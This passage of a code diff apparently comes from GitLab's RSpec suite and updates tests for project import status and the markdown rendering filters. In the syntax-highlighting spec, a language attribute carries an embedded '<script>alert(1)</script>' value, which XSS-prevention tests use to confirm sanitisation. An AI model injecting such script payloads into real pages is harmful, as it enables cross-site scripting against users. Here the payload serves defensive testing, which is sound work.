described_class.new(build(:project)) } + let(:entity) { described_class.new(build(:project, import_type: 'import_type')) } it 'includes basic fields and no failures' do expect(subject[:import_status]).to eq('none') + expect(subject[:import_type]).to eq('import_type') expect(subject[:correlation_id]).to be_nil expect(subject[:import_error]).to be_nil 
expect(subject[:failed_relations]).to eq([]) + expect(subject[:stats]).to be_nil end end context 'when import has not finished yet' do - let(:project) { create(:project, :import_scheduled, import_correlation_id: correlation_id) } - let(:entity) { described_class.new(project) } + let(:project) { create(:project, :import_scheduled, import_type: 'import_type', import_correlation_id: correlation_id) } + let(:entity) { described_class.new(project, import_type: 'import_type') } - it 'includes basic fields and no failures', :aggregate_failures do + it 'includes basic fields and no failures' do expect(subject[:import_status]).to eq('scheduled') + expect(subject[:import_type]).to eq('import_type') expect(subject[:correlation_id]).to eq(correlation_id) expect(subject[:import_error]).to be_nil expect(subject[:failed_relations]).to eq([]) @@ -32,29 +35,64 @@ RSpec.describe API::Entities::ProjectImportStatus do end context 'when import has finished with failed relations' do - let(:project) { create(:project, :import_finished, import_correlation_id: correlation_id) } + let(:project) { create(:project, :import_finished, import_type: 'import_type', import_correlation_id: correlation_id) } let(:entity) { described_class.new(project) } - it 'includes basic fields with failed relations', :aggregate_failures do - create(:import_failure, :hard_failure, project: project, correlation_id_value: correlation_id) + it 'includes basic fields with failed relations' do + create( + :import_failure, + :hard_failure, + project: project, + correlation_id_value: correlation_id, + relation_key: 'issues', + relation_index: 1 + ) + + # Doesn't show soft failures + create(:import_failure, :soft_failure) expect(subject[:import_status]).to eq('finished') + expect(subject[:import_type]).to eq('import_type') expect(subject[:correlation_id]).to eq(correlation_id) expect(subject[:import_error]).to be_nil - expect(subject[:failed_relations]).not_to be_empty + expect(subject[:failed_relations].length).to eq(1) 
+ + failure = subject[:failed_relations].last + expect(failure[:exception_class]).to eq('RuntimeError') + expect(failure[:source]).to eq('method_call') + expect(failure[:relation_name]).to eq('issues') + expect(failure[:line_number]).to eq(1) end end context 'when import has failed' do - let(:project) { create(:project, :import_failed, import_correlation_id: correlation_id, import_last_error: 'error') } + let(:project) { create(:project, :import_failed, import_type: 'import_type', import_correlation_id: correlation_id, import_last_error: 'error') } let(:entity) { described_class.new(project) } - it 'includes basic fields with import error', :aggregate_failures do + it 'includes basic fields with import error' do expect(subject[:import_status]).to eq('failed') + expect(subject[:import_type]).to eq('import_type') expect(subject[:correlation_id]).to eq(correlation_id) expect(subject[:import_error]).to eq('error') expect(subject[:failed_relations]).to eq([]) end end + + context 'when importing from github', :clean_gitlab_redis_cache do + let(:project) { create(:project, :import_failed, import_type: 'github') } + let(:entity) { described_class.new(project) } + + before do + ::Gitlab::GithubImport::ObjectCounter.increment(project, :issues, :fetched, value: 10) + ::Gitlab::GithubImport::ObjectCounter.increment(project, :issues, :imported, value: 8) + end + + it 'exposes the import stats' do + expect(subject[:stats]).to eq( + 'fetched' => { 'issues' => 10 }, + 'imported' => { 'issues' => 8 } + ) + end + end end end diff --git a/spec/lib/banzai/filter/external_link_filter_spec.rb b/spec/lib/banzai/filter/external_link_filter_spec.rb index 630730dfc1a..24d13bdb42c 100644 --- a/spec/lib/banzai/filter/external_link_filter_spec.rb +++ b/spec/lib/banzai/filter/external_link_filter_spec.rb @@ -191,4 +191,15 @@ RSpec.describe Banzai::Filter::ExternalLinkFilter do end end end + + context 'for links that have `rel=license`' do + let(:doc) { filter %q(<a rel="license" 
href="http://example.com">rel-license</a>) } + + it_behaves_like 'an external link with rel attribute' + + it 'maintains rel license' do + expect(doc.at_css('a')).to have_attribute('rel') + expect(doc.at_css('a')['rel']).to include 'license' + end + end end diff --git a/spec/lib/banzai/filter/footnote_filter_spec.rb b/spec/lib/banzai/filter/footnote_filter_spec.rb index 54faa748d53..d41f5e8633d 100644 --- a/spec/lib/banzai/filter/footnote_filter_spec.rb +++ b/spec/lib/banzai/filter/footnote_filter_spec.rb @@ -4,6 +4,7 @@ require 'spec_helper' RSpec.describe Banzai::Filter::FootnoteFilter do include FilterSpecHelper + using RSpec::Parameterized::TableSyntax # rubocop:disable Style/AsciiComments # first[^1] and second[^second] and third[^_😄_] @@ -13,16 +14,16 @@ RSpec.describe Banzai::Filter::FootnoteFilter do # rubocop:enable Style/AsciiComments let(:footnote) do <<~EOF.strip_heredoc - <p>first<sup><a href="#fn-1" id="fnref-1">1</a></sup> and second<sup><a href="#fn-second" id="fnref-second">2</a></sup> and third<sup><a href="#fn-_%F0%9F%98%84_" id="fnref-_%F0%9F%98%84_">3</a></sup></p> - + <p>first<sup><a href="#fn-1" id="fnref-1" data-footnote-ref>1</a></sup> and second<sup><a href="#fn-second" id="fnref-second" data-footnote-ref>2</a></sup> and third<sup><a href="#fn-_%F0%9F%98%84_" id="fnref-_%F0%9F%98%84_" data-footnote-ref>3</a></sup></p> + <section data-footnotes> <ol> <li id="fn-1"> - <p>one <a href="#fnref-1" aria-label="Back to content">↩</a></p> + <p>one <a href="#fnref-1" aria-label="Back to content" data-footnote-backref>↩</a></p> </li> <li id="fn-second"> - <p>two <a href="#fnref-second" aria-label="Back to content">↩</a></p> + <p>two <a href="#fnref-second" aria-label="Back to content" data-footnote-backref>↩</a></p> </li>\n<li id="fn-_%F0%9F%98%84_"> - <p>three <a href="#fnref-_%F0%9F%98%84_" aria-label="Back to content">↩</a></p> + <p>three <a href="#fnref-_%F0%9F%98%84_" aria-label="Back to content" data-footnote-backref>↩</a></p> </li> </ol> EOF 
@@ -30,19 +31,20 @@ RSpec.describe Banzai::Filter::FootnoteFilter do let(:filtered_footnote) do <<~EOF.strip_heredoc - <p>first<sup class="footnote-ref"><a href="#fn-1-#{identifier}" id="fnref-1-#{identifier}" data-footnote-ref="">1</a></sup> and second<sup class="footnote-ref"><a href="#fn-second-#{identifier}" id="fnref-second-#{identifier}" data-footnote-ref="">2</a></sup> and third<sup class="footnote-ref"><a href="#fn-_%F0%9F%98%84_-#{identifier}" id="fnref-_%F0%9F%98%84_-#{identifier}" data-footnote-ref="">3</a></sup></p> - - <section class=\"footnotes\" data-footnotes><ol> + <p>first<sup class="footnote-ref"><a href="#fn-1-#{identifier}" id="fnref-1-#{identifier}" data-footnote-ref>1</a></sup> and second<sup class="footnote-ref"><a href="#fn-second-#{identifier}" id="fnref-second-#{identifier}" data-footnote-ref>2</a></sup> and third<sup class="footnote-ref"><a href="#fn-_%F0%9F%98%84_-#{identifier}" id="fnref-_%F0%9F%98%84_-#{identifier}" data-footnote-ref>3</a></sup></p> + <section data-footnotes class=\"footnotes\"> + <ol> <li id="fn-1-#{identifier}"> - <p>one <a href="#fnref-1-#{identifier}" aria-label="Back to content" class="footnote-backref" data-footnote-backref="">↩</a></p> + <p>one <a href="#fnref-1-#{identifier}" aria-label="Back to content" data-footnote-backref class="footnote-backref">↩</a></p> </li> <li id="fn-second-#{identifier}"> - <p>two <a href="#fnref-second-#{identifier}" aria-label="Back to content" class="footnote-backref" data-footnote-backref="">↩</a></p> + <p>two <a href="#fnref-second-#{identifier}" aria-label="Back to content" data-footnote-backref class="footnote-backref">↩</a></p> </li> <li id="fn-_%F0%9F%98%84_-#{identifier}"> - <p>three <a href="#fnref-_%F0%9F%98%84_-#{identifier}" aria-label="Back to content" class="footnote-backref" data-footnote-backref="">↩</a></p> + <p>three <a href="#fnref-_%F0%9F%98%84_-#{identifier}" aria-label="Back to content" data-footnote-backref class="footnote-backref">↩</a></p> </li> - 
</ol></section> + </ol> + </section> EOF end @@ -52,7 +54,7 @@ RSpec.describe Banzai::Filter::FootnoteFilter do let(:identifier) { link_node[:id].delete_prefix('fnref-1-') } it 'properly adds the necessary ids and classes' do - expect(doc.to_html).to eq filtered_footnote + expect(doc.to_html).to eq filtered_footnote.strip end context 'using ruby-based HTML renderer' do @@ -101,4 +103,21 @@ RSpec.describe Banzai::Filter::FootnoteFilter do end end end + + context 'when detecting footnotes' do + where(:valid, :markdown) do + true | "1. one[^1]\n[^1]: AbC" + true | "1. one[^abc]\n[^abc]: AbC" + false | '1. [one](#fnref-abc)' + false | "1. one[^1]\n[^abc]: AbC" + end + + with_them do + it 'detects valid footnotes' do + result = Banzai::Pipeline::FullPipeline.call(markdown, project: nil) + + expect(result[:output].at_css('section.footnotes').present?).to eq(valid) + end + end + end end diff --git a/spec/lib/banzai/filter/issuable_state_filter_spec.rb b/spec/lib/banzai/filter/issuable_reference_expansion_filter_spec.rb index a3851fd7cca..0840ccf19e4 100644 --- a/spec/lib/banzai/filter/issuable_state_filter_spec.rb +++ b/spec/lib/banzai/filter/issuable_reference_expansion_filter_spec.rb @@ -2,28 +2,27 @@ require 'spec_helper' -RSpec.describe Banzai::Filter::IssuableStateFilter do - include ActionView::Helpers::UrlHelper +RSpec.describe Banzai::Filter::IssuableReferenceExpansionFilter do include FilterSpecHelper - let(:user) { create(:user) } - let(:context) { { current_user: user, issuable_state_filter_enabled: true } } - let(:closed_issue) { create_issue(:closed) } - let(:project) { create(:project, :public) } - let(:group) { create(:group) } - let(:other_project) { create(:project, :public) } + let_it_be(:user) { create(:user) } + let_it_be(:project) { create(:project, :public) } + let_it_be(:group) { create(:group) } + let_it_be(:other_project) { create(:project, :public) } + let_it_be(:closed_issue) { create_issue(:closed) } + + let(:context) { { current_user: user, 
issuable_reference_expansion_enabled: true } } def create_link(text, data) - link_to(text, '', class: 'gfm has-tooltip', data: data) + ActionController::Base.helpers.link_to(text, '', class: 'gfm has-tooltip', data: data) end - def create_issue(state) - create(:issue, state, project: project) + def create_issue(state, attributes = {}) + create(:issue, state, attributes.merge(project: project)) end - def create_merge_request(state) - create(:merge_request, state, - source_project: project, target_project: project) + def create_merge_request(state, attributes = {}) + create(:merge_request, state, attributes.merge(source_project: project, target_project: project)) end it 'ignores non-GFM links' do @@ -139,6 +138,30 @@ RSpec.describe Banzai::Filter::IssuableStateFilter do expect(doc.css('a').last.text).to eq("#{moved_issue.to_reference} (moved)") end + + it 'shows title for references with +' do + issue = create_issue(:opened, title: 'Some issue') + link = create_link(issue.to_reference, issue: issue.id, reference_type: 'issue', reference_format: '+') + doc = filter(link, context) + + expect(doc.css('a').last.text).to eq("#{issue.title} (#{issue.to_reference})") + end + + it 'truncates long title for references with +' do + issue = create_issue(:opened, title: 'Some issue ' * 10) + link = create_link(issue.to_reference, issue: issue.id, reference_type: 'issue', reference_format: '+') + doc = filter(link, context) + + expect(doc.css('a').last.text).to eq("#{issue.title.truncate(50)} (#{issue.to_reference})") + end + + it 'shows both title and state for closed references with +' do + issue = create_issue(:closed, title: 'Some issue') + link = create_link(issue.to_reference, issue: issue.id, reference_type: 'issue', reference_format: '+') + doc = filter(link, context) + + expect(doc.css('a').last.text).to eq("#{issue.title} (#{issue.to_reference} - closed)") + end end context 'for merge request references' do @@ -197,5 +220,20 @@ RSpec.describe 
Banzai::Filter::IssuableStateFilter do expect(doc.css('a').last.text).to eq("#{merge_request.to_reference} (merged)") end + + it 'shows title for references with +' do + merge_request = create_merge_request(:opened, title: 'Some merge request') + + link = create_link( + merge_request.to_reference, + merge_request: merge_request.id, + reference_type: 'merge_request', + reference_format: '+' + ) + + doc = filter(link, context) + + expect(doc.css('a').last.text).to eq("#{merge_request.title} (#{merge_request.to_reference})") + end end end diff --git a/spec/lib/banzai/filter/markdown_filter_spec.rb b/spec/lib/banzai/filter/markdown_filter_spec.rb index a310de5c015..1c9b894e885 100644 --- a/spec/lib/banzai/filter/markdown_filter_spec.rb +++ b/spec/lib/banzai/filter/markdown_filter_spec.rb @@ -33,7 +33,7 @@ RSpec.describe Banzai::Filter::MarkdownFilter do it 'adds language to lang attribute when specified' do result = filter("```html\nsome code\n```", no_sourcepos: true) - if Feature.enabled?(:use_cmark_renderer) + if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) expect(result).to start_with('<pre lang="html"><code>') else expect(result).to start_with('<pre><code lang="html">') @@ -49,7 +49,7 @@ RSpec.describe Banzai::Filter::MarkdownFilter do it 'works with utf8 chars in language' do result = filter("```日\nsome code\n```", no_sourcepos: true) - if Feature.enabled?(:use_cmark_renderer) + if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) expect(result).to start_with('<pre lang="日"><code>') else expect(result).to start_with('<pre><code lang="日">') @@ -59,7 +59,7 @@ RSpec.describe Banzai::Filter::MarkdownFilter do it 'works with additional language parameters' do result = filter("```ruby:red gem foo\nsome code\n```", no_sourcepos: true) - if Feature.enabled?(:use_cmark_renderer) + if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) expect(result).to start_with('<pre lang="ruby:red" data-meta="gem foo"><code>') else 
expect(result).to start_with('<pre><code lang="ruby:red gem foo">') @@ -102,7 +102,7 @@ RSpec.describe Banzai::Filter::MarkdownFilter do expect(result).to include('<td>foot <sup') - if Feature.enabled?(:use_cmark_renderer) + if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) expect(result).to include('<section class="footnotes" data-footnotes>') else expect(result).to include('<section class="footnotes">') diff --git a/spec/lib/banzai/filter/plantuml_filter_spec.rb b/spec/lib/banzai/filter/plantuml_filter_spec.rb index d1a3b5689a8..e1e02c09fbe 100644 --- a/spec/lib/banzai/filter/plantuml_filter_spec.rb +++ b/spec/lib/banzai/filter/plantuml_filter_spec.rb @@ -9,7 +9,7 @@ RSpec.describe Banzai::Filter::PlantumlFilter do it 'replaces plantuml pre tag with img tag' do stub_application_setting(plantuml_enabled: true, plantuml_url: "http://localhost:8080") - input = if Feature.enabled?(:use_cmark_renderer) + input = if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) '<pre lang="plantuml"><code>Bob -> Sara : Hello</code></pre>' else '<pre><code lang="plantuml">Bob -> Sara : Hello</code></pre>' @@ -24,7 +24,7 @@ RSpec.describe Banzai::Filter::PlantumlFilter do it 'does not replace plantuml pre tag with img tag if disabled' do stub_application_setting(plantuml_enabled: false) - if Feature.enabled?(:use_cmark_renderer) + if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) input = '<pre lang="plantuml"><code>Bob -> Sara : Hello</code></pre>' output = '<pre lang="plantuml"><code>Bob -> Sara : Hello</code></pre>' else @@ -40,7 +40,7 @@ RSpec.describe Banzai::Filter::PlantumlFilter do it 'does not replace plantuml pre tag with img tag if url is invalid' do stub_application_setting(plantuml_enabled: true, plantuml_url: "invalid") - input = if Feature.enabled?(:use_cmark_renderer) + input = if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) '<pre lang="plantuml"><code>Bob -> Sara : Hello</code></pre>' else '<pre><code 
lang="plantuml">Bob -> Sara : Hello</code></pre>' diff --git a/spec/lib/banzai/filter/references/issue_reference_filter_spec.rb b/spec/lib/banzai/filter/references/issue_reference_filter_spec.rb index 88c2494b243..14c1542b724 100644 --- a/spec/lib/banzai/filter/references/issue_reference_filter_spec.rb +++ b/spec/lib/banzai/filter/references/issue_reference_filter_spec.rb @@ -116,6 +116,22 @@ RSpec.describe Banzai::Filter::References::IssueReferenceFilter do expect(doc.children.first.attr('data-original')).to eq inner_html end + it 'includes a data-reference-format attribute' do + doc = reference_filter("Issue #{reference}+") + link = doc.css('a').first + + expect(link).to have_attribute('data-reference-format') + expect(link.attr('data-reference-format')).to eq('+') + end + + it 'includes a data-reference-format attribute for URL references' do + doc = reference_filter("Issue #{issue_url}+") + link = doc.css('a').first + + expect(link).to have_attribute('data-reference-format') + expect(link.attr('data-reference-format')).to eq('+') + end + it 'supports an :only_path context' do doc = reference_filter("Issue #{reference}", only_path: true) link = doc.css('a').first.attr('href') diff --git a/spec/lib/banzai/filter/references/merge_request_reference_filter_spec.rb b/spec/lib/banzai/filter/references/merge_request_reference_filter_spec.rb index ee2ce967a47..3c488820853 100644 --- a/spec/lib/banzai/filter/references/merge_request_reference_filter_spec.rb +++ b/spec/lib/banzai/filter/references/merge_request_reference_filter_spec.rb @@ -109,6 +109,22 @@ RSpec.describe Banzai::Filter::References::MergeRequestReferenceFilter do expect(link.attr('data-merge-request')).to eq merge.id.to_s end + it 'includes a data-reference-format attribute' do + doc = reference_filter("Merge #{reference}+") + link = doc.css('a').first + + expect(link).to have_attribute('data-reference-format') + expect(link.attr('data-reference-format')).to eq('+') + end + + it 'includes a 
data-reference-format attribute for URL references' do + doc = reference_filter("Merge #{urls.project_merge_request_url(project, merge)}+") + link = doc.css('a').first + + expect(link).to have_attribute('data-reference-format') + expect(link.attr('data-reference-format')).to eq('+') + end + it 'supports an :only_path context' do doc = reference_filter("Merge #{reference}", only_path: true) link = doc.css('a').first.attr('href') diff --git a/spec/lib/banzai/filter/references/reference_cache_spec.rb b/spec/lib/banzai/filter/references/reference_cache_spec.rb index dcd153da16a..dc43c33a08d 100644 --- a/spec/lib/banzai/filter/references/reference_cache_spec.rb +++ b/spec/lib/banzai/filter/references/reference_cache_spec.rb @@ -35,18 +35,6 @@ RSpec.describe Banzai::Filter::References::ReferenceCache do subject end - - context 'when feature flag is disabled' do - before do - stub_feature_flags(reference_cache_memoization: false) - end - - it 'ignores memoized rendered HTML' do - expect(doc).to receive(:to_html).and_call_original - - subject - end - end end context 'when result is not available' do diff --git a/spec/lib/banzai/filter/sanitization_filter_spec.rb b/spec/lib/banzai/filter/sanitization_filter_spec.rb index 8eb8e5cf800..24e787bddd5 100644 --- a/spec/lib/banzai/filter/sanitization_filter_spec.rb +++ b/spec/lib/banzai/filter/sanitization_filter_spec.rb @@ -115,6 +115,11 @@ RSpec.describe Banzai::Filter::SanitizationFilter do expect(filter(act).to_html).to eq exp end + it 'allows `rel=license` in links' do + exp = act = '<a rel="license" href="http://example.com">rel-license</a>' + expect(filter(act).to_html).to eq exp + end + it 'allows `data-math-style` attribute on `code` and `pre` elements' do html = <<-HTML <pre class="code" data-math-style="inline">something</pre> diff --git a/spec/lib/banzai/filter/syntax_highlight_filter_spec.rb b/spec/lib/banzai/filter/syntax_highlight_filter_spec.rb index dfe022b51d2..ef46fd62486 100644 --- 
a/spec/lib/banzai/filter/syntax_highlight_filter_spec.rb +++ b/spec/lib/banzai/filter/syntax_highlight_filter_spec.rb @@ -24,7 +24,7 @@ RSpec.describe Banzai::Filter::SyntaxHighlightFilter do it "highlights as plaintext" do result = filter('<pre><code>def fun end</code></pre>') - expect(result.to_html).to eq('<pre class="code highlight js-syntax-highlight language-plaintext" lang="plaintext" v-pre="true"><code><span id="LC1" class="line" lang="plaintext">def fun end</span></code></pre>') + expect(result.to_html.delete("\n")).to eq('<div class="gl-relative markdown-code-block js-markdown-code"><pre class="code highlight js-syntax-highlight language-plaintext" lang="plaintext" v-pre="true"><code><span id="LC1" class="line" lang="plaintext">def fun end</span></code></pre><copy-code></copy-code></div>') end include_examples "XSS prevention", "" @@ -40,13 +40,13 @@ RSpec.describe Banzai::Filter::SyntaxHighlightFilter do context "when a valid language is specified" do it "highlights as that language" do - result = if Feature.enabled?(:use_cmark_renderer) + result = if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) filter('<pre lang="ruby"><code>def fun end</code></pre>') else filter('<pre><code lang="ruby">def fun end</code></pre>') end - expect(result.to_html).to eq('<pre class="code highlight js-syntax-highlight language-ruby" lang="ruby" v-pre="true"><code><span id="LC1" class="line" lang="ruby"><span class="k">def</span> <span class="nf">fun</span> <span class="k">end</span></span></code></pre>') + expect(result.to_html.delete("\n")).to eq('<div class="gl-relative markdown-code-block js-markdown-code"><pre class="code highlight js-syntax-highlight language-ruby" lang="ruby" v-pre="true"><code><span id="LC1" class="line" lang="ruby"><span class="k">def</span> <span class="nf">fun</span> <span class="k">end</span></span></code></pre><copy-code></copy-code></div>') end include_examples "XSS prevention", "ruby" @@ -54,13 +54,13 @@ RSpec.describe 
Banzai::Filter::SyntaxHighlightFilter do context "when an invalid language is specified" do it "highlights as plaintext" do - result = if Feature.enabled?(:use_cmark_renderer) + result = if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) filter('<pre lang="gnuplot"><code>This is a test</code></pre>') else filter('<pre><code lang="gnuplot">This is a test</code></pre>') end - expect(result.to_html).to eq('<pre class="code highlight js-syntax-highlight language-plaintext" lang="plaintext" v-pre="true"><code><span id="LC1" class="line" lang="plaintext">This is a test</span></code></pre>') + expect(result.to_html.delete("\n")).to eq('<div class="gl-relative markdown-code-block js-markdown-code"><pre class="code highlight js-syntax-highlight language-plaintext" lang="plaintext" v-pre="true"><code><span id="LC1" class="line" lang="plaintext">This is a test</span></code></pre><copy-code></copy-code></div>') end include_examples "XSS prevention", "gnuplot" @@ -73,13 +73,13 @@ RSpec.describe Banzai::Filter::SyntaxHighlightFilter do %w(math mermaid plantuml suggestion).each do |lang| context "when #{lang} is specified" do it "highlights as plaintext but with the correct language attribute and class" do - result = if Feature.enabled?(:use_cmark_renderer) + result = if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) filter(%{<pre lang="#{lang}"><code>This is a test</code></pre>}) else filter(%{<pre><code lang="#{lang}">This is a test</code></pre>}) end - expect(result.to_html).to eq(%{<pre class="code highlight js-syntax-highlight language-#{lang}" lang="#{lang}" v-pre="true"><code><span id="LC1" class="line" lang="#{lang}">This is a test</span></code></pre>}) + expect(result.to_html.delete("\n")).to eq(%{<div class="gl-relative markdown-code-block js-markdown-code"><pre class="code highlight js-syntax-highlight language-#{lang}" lang="#{lang}" v-pre="true"><code><span id="LC1" class="line" lang="#{lang}">This is a 
test</span></code></pre><copy-code></copy-code></div>}) end include_examples "XSS prevention", lang @@ -89,7 +89,7 @@ RSpec.describe Banzai::Filter::SyntaxHighlightFilter do let(:lang_params) { 'foo-bar-kux' } let(:xss_lang) do - if Feature.enabled?(:use_cmark_renderer) + if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) "#{lang} data-meta=\"foo-bar-kux\"<script>alert(1)</script>" else "#{lang}#{described_class::LANG_PARAMS_DELIMITER}<script>alert(1)</script>" @@ -97,18 +97,18 @@ RSpec.describe Banzai::Filter::SyntaxHighlightFilter do end it "includes data-lang-params tag with extra information" do - result = if Feature.enabled?(:use_cmark_renderer) + result = if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) filter(%{<pre lang="#{lang}" data-meta="#{lang_params}"><code>This is a test</code></pre>}) else filter(%{<pre><code lang="#{lang}#{delimiter}#{lang_params}">This is a test</code></pre>}) end - expect(result.to_html).to eq(%{<pre class="code highlight js-syntax-highlight language-#{lang}" lang="#{lang}" #{data_attr}="#{lang_params}" v-pre="true"><code><span id="LC1" class="line" lang="#{lang}">This is a test</span></code></pre>}) + expect(result.to_html.delete("\n")).to eq(%{<div class="gl-relative markdown-code-block js-markdown-code"><pre class="code highlight js-syntax-highlight language-#{lang}" lang="#{lang}" #{data_attr}="#{lang_params}" v-pre="true"><code><span id="LC1" class="line" lang="#{lang}">This is a test</span></code></pre><copy-code></copy-code></div>}) end include_examples "XSS prevention", lang - if Feature.enabled?(:use_cmark_renderer) + if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) include_examples "XSS prevention", "#{lang} data-meta=\"foo-bar-kux\"<script>alert(1)</script>" else @@ -126,19 +126,19 @@ RSpec.describe Banzai::Filter::SyntaxHighlightFilter do let(:lang_params) { '-1+10' } let(:expected_result) do - %{<pre class="code highlight js-syntax-highlight language-#{lang}" 
lang="#{lang}" #{data_attr}="#{lang_params} more-things" v-pre="true"><code><span id="LC1" class="line" lang="#{lang}">This is a test</span></code></pre>} + %{<div class="gl-relative markdown-code-block js-markdown-code"><pre class="code highlight js-syntax-highlight language-#{lang}" lang="#{lang}" #{data_attr}="#{lang_params} more-things" v-pre="true"><code><span id="LC1" class="line" lang="#{lang}">This is a test</span></code></pre><copy-code></copy-code></div>} end context 'when delimiter is space' do it 'delimits on the first appearance' do - if Feature.enabled?(:use_cmark_renderer) + if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) result = filter(%{<pre lang="#{lang}" data-meta="#{lang_params} more-things"><code>This is a test</code></pre>}) - expect(result.to_html).to eq(expected_result) + expect(result.to_html.delete("\n")).to eq(expected_result) else result = filter(%{<pre><code lang="#{lang}#{delimiter}#{lang_params}#{delimiter}more-things">This is a test</code></pre>}) - expect(result.to_html).to eq(%{<pre class="code highlight js-syntax-highlight language-#{lang}" lang="#{lang}" #{data_attr}="#{lang_params}#{delimiter}more-things" v-pre="true"><code><span id="LC1" class="line" lang="#{lang}">This is a test</span></code></pre>}) + expect(result.to_html.delete("\n")).to eq(%{<div class="gl-relative markdown-code-block js-markdown-code"><pre class="code highlight js-syntax-highlight language-#{lang}" lang="#{lang}" #{data_attr}="#{lang_params}#{delimiter}more-things" v-pre="true"><code><span id="LC1" class="line" lang="#{lang}">This is a test</span></code></pre><copy-code></copy-code></div>}) end end end @@ -147,10 +147,10 @@ RSpec.describe Banzai::Filter::SyntaxHighlightFilter do it 'delimits on the first appearance' do result = filter(%{<pre lang="#{lang}#{delimiter}#{lang_params} more-things"><code>This is a test</code></pre>}) - if Feature.enabled?(:use_cmark_renderer) - expect(result.to_html).to eq(expected_result) + if 
Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) + expect(result.to_html.delete("\n")).to eq(expected_result) else - expect(result.to_html).to eq(%{<pre class=\"code highlight js-syntax-highlight language-plaintext\" lang=\"plaintext\" v-pre=\"true\"><code><span id=\"LC1\" class=\"line\" lang=\"plaintext\">This is a test</span></code></pre>}) + expect(result.to_html.delete("\n")).to eq(%{<div class="gl-relative markdown-code-block js-markdown-code"><pre class=\"code highlight js-syntax-highlight language-plaintext\" lang=\"plaintext\" v-pre=\"true\"><code><span id=\"LC1\" class=\"line\" lang=\"plaintext\">This is a test</span></code></pre><copy-code></copy-code></div>}) end end end @@ -161,7 +161,7 @@ RSpec.describe Banzai::Filter::SyntaxHighlightFilter do it "includes it in the highlighted code block" do result = filter('<pre data-sourcepos="1:1-3:3"><code lang="plaintext">This is a test</code></pre>') - expect(result.to_html).to eq('<pre data-sourcepos="1:1-3:3" class="code highlight js-syntax-highlight language-plaintext" lang="plaintext" v-pre="true"><code><span id="LC1" class="line" lang="plaintext">This is a test</span></code></pre>') + expect(result.to_html.delete("\n")).to eq('<div class="gl-relative markdown-code-block js-markdown-code"><pre data-sourcepos="1:1-3:3" class="code highlight js-syntax-highlight language-plaintext" lang="plaintext" v-pre="true"><code><span id="LC1" class="line" lang="plaintext">This is a test</span></code></pre><copy-code></copy-code></div>') end end @@ -173,13 +173,13 @@ RSpec.describe Banzai::Filter::SyntaxHighlightFilter do end it "highlights as plaintext" do - result = if Feature.enabled?(:use_cmark_renderer) + result = if Feature.enabled?(:use_cmark_renderer, default_enabled: :yaml) filter('<pre lang="ruby"><code>This is a test</code></pre>') else filter('<pre><code lang="ruby">This is a test</code></pre>') end - expect(result.to_html).to eq('<pre class="code highlight js-syntax-highlight" lang="" 
v-pre="true"><code><span id="LC1" class="line" lang="">This is a test</span></code></pre>') + expect(result.to_html.delete("\n")).to eq('<div class="gl-relative markdown-code-block js-markdown-code"><pre class="code highlight js-syntax-highlight" lang="" v-pre="true"><code><span id="LC1" class="line" lang="">This is a test</span></code></pre><copy-code></copy-code></div>') end include_examples "XSS prevention", "ruby" diff --git a/spec/lib/banzai/pipeline/full_pipeline_spec.rb b/spec/lib/banzai/pipeline/full_pipeline_spec.rb index 01bca7b23e8..620b7d97a5b 100644 --- a/spec/lib/banzai/pipeline/full_pipeline_spec.rb +++ b/spec/lib/banzai/pipeline/full_pipeline_spec.rb @@ -43,26 +43,27 @@ RSpec.describe Banzai::Pipeline::FullPipeline do let(:filtered_footnote) do <<~EOF.strip_heredoc - <p dir="auto">first<sup class="footnote-ref"><a href="#fn-1-#{identifier}" id="fnref-1-#{identifier}" data-footnote-ref="">1</a></sup> and second<sup class="footnote-ref"><a href="#fn-%F0%9F%98%84second-#{identifier}" id="fnref-%F0%9F%98%84second-#{identifier}" data-footnote-ref="">2</a></sup> and twenty<sup class="footnote-ref"><a href="#fn-_twenty-#{identifier}" id="fnref-_twenty-#{identifier}" data-footnote-ref="">3</a></sup></p> - - <section class="footnotes" data-footnotes><ol> + <p dir="auto">first<sup class="footnote-ref"><a href="#fn-1-#{identifier}" id="fnref-1-#{identifier}" data-footnote-ref>1</a></sup> and second<sup class="footnote-ref"><a href="#fn-%F0%9F%98%84second-#{identifier}" id="fnref-%F0%9F%98%84second-#{identifier}" data-footnote-ref>2</a></sup> and twenty<sup class="footnote-ref"><a href="#fn-_twenty-#{identifier}" id="fnref-_twenty-#{identifier}" data-footnote-ref>3</a></sup></p> + <section data-footnotes class="footnotes"> + <ol> <li id="fn-1-#{identifier}"> - <p>one <a href="#fnref-1-#{identifier}" aria-label="Back to content" class="footnote-backref" data-footnote-backref=""><gl-emoji title="leftwards arrow with hook" data-name="leftwards_arrow_with_hook" 
data-unicode-version="1.1">↩</gl-emoji></a></p> + <p>one <a href="#fnref-1-#{identifier}" data-footnote-backref aria-label="Back to content" class="footnote-backref"><gl-emoji title="leftwards arrow with hook" data-name="leftwards_arrow_with_hook" data-unicode-version="1.1">↩</gl-emoji></a></p> </li> <li id="fn-%F0%9F%98%84second-#{identifier}"> - <p>two <a href="#fnref-%F0%9F%98%84second-#{identifier}" aria-label="Back to content" class="footnote-backref" data-footnote-backref=""><gl-emoji title="leftwards arrow with hook" data-name="leftwards_arrow_with_hook" data-unicode-version="1.1">↩</gl-emoji></a></p> + <p>two <a href="#fnref-%F0%9F%98%84second-#{identifier}" data-footnote-backref aria-label="Back to content" class="footnote-backref"><gl-emoji title="leftwards arrow with hook" data-name="leftwards_arrow_with_hook" data-unicode-version="1.1">↩</gl-emoji></a></p> </li> <li id="fn-_twenty-#{identifier}"> - <p>twenty <a href="#fnref-_twenty-#{identifier}" aria-label="Back to content" class="footnote-backref" data-footnote-backref=""><gl-emoji title="leftwards arrow with hook" data-name="leftwards_arrow_with_hook" 